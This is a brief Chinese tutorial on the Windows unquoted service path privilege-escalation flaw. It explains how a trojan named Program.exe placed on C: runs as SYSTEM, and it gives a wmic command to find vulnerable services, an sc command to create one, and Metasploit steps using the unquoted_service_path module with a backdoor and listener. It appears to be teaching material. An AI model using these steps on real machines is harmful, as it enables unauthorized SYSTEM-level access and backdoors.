企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## 可信任服务路径漏洞 其实就是系统服务的可执行文件的路径没有被双引号引起来,且有空格,那么这个服务就存在这个漏洞 ## 利用 原理:对于C:\\\Program Files\\Test Folder\\dongta.exe文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前的名字向匹配的程序。操作系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。 ~~~ C:\\Program.exe C:\\Program Files\Test.exe C:\\Program Files\Test Folder\dongta.exe ~~~ ## 危害 所以如果我们能够上传一个适当命名的恶意可执行程序在受影响的目录,比如这里我把木马名字改了Program.exe,放在c盘,一旦此服务重启,因为优先级的缘故,服务会优先选择我们木马Program.exe,那么我们的恶意程序就会以system权限运行 ## wmi查找含有漏洞的服务命令 ~~~ wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v ""“ ~~~ ## 创建一个服务 ~~~ sc create mytest binPath= "C:\Program Files\learntest\dongta test\calc.exe" start= auto ~~~ ## 利用方法 ~~~ 1、手动利用 查找含有漏洞的服务命令 msf创建一个后门木马,根据漏洞服务命令 攻击机开启msf监听服务 重启目标的服务或者计算机 sc start mytest 2、msf利用 进入msf服务 msfconsole 使用msf的模块:exploit/windows/local/unquoted_service_path search unquoted_service_path use 0 show options set ..... ~~~ ## 条件 需要拥有对于服务写入的权限